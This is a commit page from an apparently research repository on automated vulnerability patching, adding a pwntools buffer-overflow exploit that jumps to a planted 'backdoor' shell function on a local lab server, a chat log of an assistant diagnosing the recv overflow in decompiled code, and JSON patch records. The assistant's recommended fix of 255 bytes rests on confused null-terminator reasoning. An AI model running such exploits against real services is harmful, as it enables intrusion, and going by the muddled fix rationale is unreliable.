danger/program
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

1second-commit

Browse Source
This commit is contained in:
danger
2024-10-20 11:00:08 +08:00
parent ae53b6da83
commit f9c69cbd47
6 changed files with 66 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
input/recv.i64
View File

Binary file not shown.

12
output/recv_patch/recv.py Normal file
View File

@@ -0,0 +1,12 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from pwn import *
context.clear(arch='amd64', os='linux', log_level='info')
elf = ELF('./recv')
sh = remote('127.0.0.1', 11007)
sh.sendline(cyclic(264) + p64(elf.sym['backdoor']))
sh.interactive()

BIN
output/recv_patch/recv_src Executable file
View File

Binary file not shown.

40
src/chat_log.json
View File

@@ -170,5 +170,45 @@
"role": "assistant",
"content": "Yes, reason: The recv function in the echo_handler function does not check the size of the buffer being passed to it, which can lead to a buffer overflow if the data received is larger than the buffer size of 256 bytes."
}
],
[
{
"role": "user",
"content": "There is a risk of buffer overflow when using recv in the program. Please tell me the specific size be prepared for recv to ensure the program work safely. Answer with 'size=value, ', and then give me the reason.\n//Function: echo_handler ->0x4199222 7 perm->5\nint __cdecl echo_handler(int sock)\n{\n char buffer[256]; // [rsp+10h] [rbp-100h] BYREF\n\n memset(buffer, 0, sizeof(buffer));\n if ( recv(sock, buffer, 0x400uLL, 0) <= 0 )\n return 0;\n printf(\"Message from client: %s\\n\", buffer);\n if ( send(sock, \"Hello from server\\n\", 0x12uLL, 0) <= 0 )\n return 0;\n puts(\"Hello message sent\");\n return 1;\n}\n\n\n//Function: main ->0x4199683 7 perm->5\nint __fastcall main(int argc, const char **argv, const char **envp)\n{\n uint16_t v3; // ax\n char client_addr_str[24]; // [rsp+0h] [rbp-40h] BYREF\n int addrlen; // [rsp+18h] [rbp-28h] BYREF\n int opt; // [rsp+1Ch] [rbp-24h] BYREF\n sockaddr_in address; // [rsp+20h] [rbp-20h] BYREF\n int new_socket; // [rsp+38h] [rbp-8h]\n int server_fd; // [rsp+3Ch] [rbp-4h]\n\n opt = 1;\n addrlen = 16;\n server_fd = socket(2, 1, 0);\n if ( !server_fd )\n {\n perror(\"socket failed\");\n exit(1);\n }\n if ( setsockopt(server_fd, 1, 15, &opt, 4u) )\n {\n perror(\"setsockopt\");\n exit(1);\n }\n address.sin_family = 2;\n address.sin_addr.s_addr = 0;\n address.sin_port = htons(0x2AFFu);\n if ( bind(server_fd, (const struct sockaddr *)&address, 0x10u) < 0 )\n {\n perror(\"bind failed\");\n exit(1);\n }\n if ( listen(server_fd, 3) < 0 )\n {\n perror(\"listen\");\n exit(1);\n }\n printf(\"TCP server listening on port %d\\n\", 11007);\n new_socket = accept(server_fd, (struct sockaddr *)&address, (socklen_t *)&addrlen);\n if ( new_socket < 0 )\n {\n perror(\"accept\");\n exit(1);\n }\n inet_ntop(2, &address.sin_addr, client_addr_str, 0x10u);\n v3 = ntohs(address.sin_port);\n printf(\"Accept %s:%d\\n\", client_addr_str, v3);\n while ( echo_handler(new_socket) )\n ;\n close(new_socket);\n return 0;\n}\n\n\n//Function: backdoor ->0x4200139 7 perm->5\nint __cdecl backdoor()\n{\n char *new_envp[2]; // [rsp+0h] [rbp-20h] BYREF\n char *new_argv[2]; // [rsp+10h] [rbp-10h] BYREF\n\n new_argv[1] = 0LL;\n new_envp[0] = \"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\";\n new_envp[1] = 0LL;\n dup2(4, 0);\n dup2(4, 1);\n dup2(4, 2);\n execve(\"/bin/sh\", new_argv, new_envp);\n return 0;\n}\n\n\n"
},
{
"role": "assistant",
"content": "size=255, The buffer size should be set to 255 to ensure that there is enough space for the received data and to prevent buffer overflow. The buffer size should always be one less than the actual size to account for the null terminator."
}
],
[
{
"role": "user",
"content": "Please analyze whether the following program contains the risk of buffer overflow and only check recv function. If it actually exists then answer with 'yes, reason here', or else output 'no recv vulnerability'.\n//Function: echo_handler ->0x4199222 7 perm->5\nint __cdecl echo_handler(int sock)\n{\n char buffer[256]; // [rsp+10h] [rbp-100h] BYREF\n\n memset(buffer, 0, sizeof(buffer));\n if ( recv(sock, buffer, 0x400uLL, 0) <= 0 )\n return 0;\n printf(\"Message from client: %s\\n\", buffer);\n if ( send(sock, \"Hello from server\\n\", 0x12uLL, 0) <= 0 )\n return 0;\n puts(\"Hello message sent\");\n return 1;\n}\n\n\n//Function: main ->0x4199683 7 perm->5\nint __fastcall main(int argc, const char **argv, const char **envp)\n{\n uint16_t v3; // ax\n char client_addr_str[24]; // [rsp+0h] [rbp-40h] BYREF\n int addrlen; // [rsp+18h] [rbp-28h] BYREF\n int opt; // [rsp+1Ch] [rbp-24h] BYREF\n sockaddr_in address; // [rsp+20h] [rbp-20h] BYREF\n int new_socket; // [rsp+38h] [rbp-8h]\n int server_fd; // [rsp+3Ch] [rbp-4h]\n\n opt = 1;\n addrlen = 16;\n server_fd = socket(2, 1, 0);\n if ( !server_fd )\n {\n perror(\"socket failed\");\n exit(1);\n }\n if ( setsockopt(server_fd, 1, 15, &opt, 4u) )\n {\n perror(\"setsockopt\");\n exit(1);\n }\n address.sin_family = 2;\n address.sin_addr.s_addr = 0;\n address.sin_port = htons(0x2AFFu);\n if ( bind(server_fd, (const struct sockaddr *)&address, 0x10u) < 0 )\n {\n perror(\"bind failed\");\n exit(1);\n }\n if ( listen(server_fd, 3) < 0 )\n {\n perror(\"listen\");\n exit(1);\n }\n printf(\"TCP server listening on port %d\\n\", 11007);\n new_socket = accept(server_fd, (struct sockaddr *)&address, (socklen_t *)&addrlen);\n if ( new_socket < 0 )\n {\n perror(\"accept\");\n exit(1);\n }\n inet_ntop(2, &address.sin_addr, client_addr_str, 0x10u);\n v3 = ntohs(address.sin_port);\n printf(\"Accept %s:%d\\n\", client_addr_str, v3);\n while ( echo_handler(new_socket) )\n ;\n close(new_socket);\n return 0;\n}\n\n\n//Function: backdoor ->0x4200139 7 perm->5\nint __cdecl backdoor()\n{\n char *new_envp[2]; // [rsp+0h] [rbp-20h] BYREF\n char *new_argv[2]; // [rsp+10h] [rbp-10h] BYREF\n\n new_argv[1] = 0LL;\n new_envp[0] = \"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\";\n new_envp[1] = 0LL;\n dup2(4, 0);\n dup2(4, 1);\n dup2(4, 2);\n execve(\"/bin/sh\", new_argv, new_envp);\n return 0;\n}\n\n\n"
},
{
"role": "assistant",
"content": "Yes, reason: The recv function in the echo_handler function does not check the size of the buffer being passed to it. It receives up to 0x400 bytes of data into the buffer, which is only 256 bytes in size. This can lead to a buffer overflow vulnerability if more than 256 bytes of data are received, potentially causing a buffer overflow and overwriting adjacent memory."
}
],
[
{
"role": "user",
"content": "There is a risk of buffer overflow when using recv in the program. Please tell me the specific size be prepared for recv to ensure the program work safely. Answer with 'size=value, ', and then give me the reason.\n//Function: echo_handler ->0x4199222 7 perm->5\nint __cdecl echo_handler(int sock)\n{\n char buffer[256]; // [rsp+10h] [rbp-100h] BYREF\n\n memset(buffer, 0, sizeof(buffer));\n if ( recv(sock, buffer, 0x400uLL, 0) <= 0 )\n return 0;\n printf(\"Message from client: %s\\n\", buffer);\n if ( send(sock, \"Hello from server\\n\", 0x12uLL, 0) <= 0 )\n return 0;\n puts(\"Hello message sent\");\n return 1;\n}\n\n\n//Function: main ->0x4199683 7 perm->5\nint __fastcall main(int argc, const char **argv, const char **envp)\n{\n uint16_t v3; // ax\n char client_addr_str[24]; // [rsp+0h] [rbp-40h] BYREF\n int addrlen; // [rsp+18h] [rbp-28h] BYREF\n int opt; // [rsp+1Ch] [rbp-24h] BYREF\n sockaddr_in address; // [rsp+20h] [rbp-20h] BYREF\n int new_socket; // [rsp+38h] [rbp-8h]\n int server_fd; // [rsp+3Ch] [rbp-4h]\n\n opt = 1;\n addrlen = 16;\n server_fd = socket(2, 1, 0);\n if ( !server_fd )\n {\n perror(\"socket failed\");\n exit(1);\n }\n if ( setsockopt(server_fd, 1, 15, &opt, 4u) )\n {\n perror(\"setsockopt\");\n exit(1);\n }\n address.sin_family = 2;\n address.sin_addr.s_addr = 0;\n address.sin_port = htons(0x2AFFu);\n if ( bind(server_fd, (const struct sockaddr *)&address, 0x10u) < 0 )\n {\n perror(\"bind failed\");\n exit(1);\n }\n if ( listen(server_fd, 3) < 0 )\n {\n perror(\"listen\");\n exit(1);\n }\n printf(\"TCP server listening on port %d\\n\", 11007);\n new_socket = accept(server_fd, (struct sockaddr *)&address, (socklen_t *)&addrlen);\n if ( new_socket < 0 )\n {\n perror(\"accept\");\n exit(1);\n }\n inet_ntop(2, &address.sin_addr, client_addr_str, 0x10u);\n v3 = ntohs(address.sin_port);\n printf(\"Accept %s:%d\\n\", client_addr_str, v3);\n while ( echo_handler(new_socket) )\n ;\n close(new_socket);\n return 0;\n}\n\n\n//Function: backdoor ->0x4200139 7 perm->5\nint __cdecl backdoor()\n{\n char *new_envp[2]; // [rsp+0h] [rbp-20h] BYREF\n char *new_argv[2]; // [rsp+10h] [rbp-10h] BYREF\n\n new_argv[1] = 0LL;\n new_envp[0] = \"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\";\n new_envp[1] = 0LL;\n dup2(4, 0);\n dup2(4, 1);\n dup2(4, 2);\n execve(\"/bin/sh\", new_argv, new_envp);\n return 0;\n}\n\n\n"
},
{
"role": "assistant",
"content": "size=255, The buffer size should be set to 255 to ensure that there is enough space for the received data and to prevent buffer overflow. In this case, the buffer size is set to 256, which leaves room for a null terminator at the end of the string."
}
],
[
{
"role": "user",
"content": "Please analyze whether the following program contains the risk of buffer overflow and only check recv function. If it actually exists then answer with 'yes, reason here', or else output 'no recv vulnerability'.\n//Function: echo_handler ->0x4199222 7 perm->5\nint __cdecl echo_handler(int sock)\n{\n char buffer[256]; // [rsp+10h] [rbp-100h] BYREF\n\n memset(buffer, 0, sizeof(buffer));\n if ( recv(sock, buffer, 0x400uLL, 0) <= 0 )\n return 0;\n printf(\"Message from client: %s\\n\", buffer);\n if ( send(sock, \"Hello from server\\n\", 0x12uLL, 0) <= 0 )\n return 0;\n puts(\"Hello message sent\");\n return 1;\n}\n\n\n//Function: main ->0x4199683 7 perm->5\nint __fastcall main(int argc, const char **argv, const char **envp)\n{\n uint16_t v3; // ax\n char client_addr_str[24]; // [rsp+0h] [rbp-40h] BYREF\n int addrlen; // [rsp+18h] [rbp-28h] BYREF\n int opt; // [rsp+1Ch] [rbp-24h] BYREF\n sockaddr_in address; // [rsp+20h] [rbp-20h] BYREF\n int new_socket; // [rsp+38h] [rbp-8h]\n int server_fd; // [rsp+3Ch] [rbp-4h]\n\n opt = 1;\n addrlen = 16;\n server_fd = socket(2, 1, 0);\n if ( !server_fd )\n {\n perror(\"socket failed\");\n exit(1);\n }\n if ( setsockopt(server_fd, 1, 15, &opt, 4u) )\n {\n perror(\"setsockopt\");\n exit(1);\n }\n address.sin_family = 2;\n address.sin_addr.s_addr = 0;\n address.sin_port = htons(0x2AFFu);\n if ( bind(server_fd, (const struct sockaddr *)&address, 0x10u) < 0 )\n {\n perror(\"bind failed\");\n exit(1);\n }\n if ( listen(server_fd, 3) < 0 )\n {\n perror(\"listen\");\n exit(1);\n }\n printf(\"TCP server listening on port %d\\n\", 11007);\n new_socket = accept(server_fd, (struct sockaddr *)&address, (socklen_t *)&addrlen);\n if ( new_socket < 0 )\n {\n perror(\"accept\");\n exit(1);\n }\n inet_ntop(2, &address.sin_addr, client_addr_str, 0x10u);\n v3 = ntohs(address.sin_port);\n printf(\"Accept %s:%d\\n\", client_addr_str, v3);\n while ( echo_handler(new_socket) )\n ;\n close(new_socket);\n return 0;\n}\n\n\n//Function: backdoor ->0x4200139 7 perm->5\nint __cdecl backdoor()\n{\n char *new_envp[2]; // [rsp+0h] [rbp-20h] BYREF\n char *new_argv[2]; // [rsp+10h] [rbp-10h] BYREF\n\n new_argv[1] = 0LL;\n new_envp[0] = \"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\";\n new_envp[1] = 0LL;\n dup2(4, 0);\n dup2(4, 1);\n dup2(4, 2);\n execve(\"/bin/sh\", new_argv, new_envp);\n return 0;\n}\n\n\n"
},
{
"role": "assistant",
"content": "Yes, reason: The recv function in the echo_handler function does not check the size of the buffer before reading data into it. The buffer size is defined as 256 bytes, but the recv function reads up to 0x400 bytes into the buffer, which can lead to a buffer overflow vulnerability."
}
]
]

8
src/input/recv_extract/patch_recv.json Normal file
View File

@@ -0,0 +1,8 @@
[
{
"file_name": "../input/recv_extract.c",
"vul_info": " reason: The recv function in the echo_handler function does not check the size of the buffer being passed to it. It receives up to 0x400 bytes of data into the buffer, which is only 256 bytes in size. This can lead to a buffer overflow vulnerability if more than 256 bytes of data are received, potentially causing a buffer overflow and overwriting adjacent memory.",
"fix_size": 255,
"patch_info": "The buffer size should be set to 255 to ensure that there is enough space for the received data and to prevent buffer overflow. The buffer size should always be one less than the actual size to account for the null terminator."
}
]

6
src/output/recv_extract/patch_recv.json
View File

@@ -40,5 +40,11 @@
"vul_info": " the program contains a risk of buffer overflow in the recv function. The recv function is called with a buffer size of 0x400 (1024 bytes), but the buffer allocated in the echo_handler function is only 256 bytes. This means that if the recv function receives more than 256 bytes of data, it will overflow the buffer and potentially overwrite other memory areas.",
"fix_size": 255,
"patch_info": "The buffer size should be set to 255 to ensure that there is enough space for the received data plus a null terminator. This will prevent buffer overflow and ensure the program works safely."
},
{
"file_name": "recv_extract.c",
"vul_info": " reason: The recv function in the echo_handler function does not check the size of the buffer before reading data into it. The buffer size is defined as 256 bytes, but the recv function reads up to 0x400 bytes into the buffer, which can lead to a buffer overflow vulnerability.",
"fix_size": 255,
"patch_info": "The buffer size should be set to 255 to ensure that there is enough space for the received data and to prevent buffer overflow. In this case, the buffer size is set to 256, which leaves room for a null terminator at the end of the string."
}
]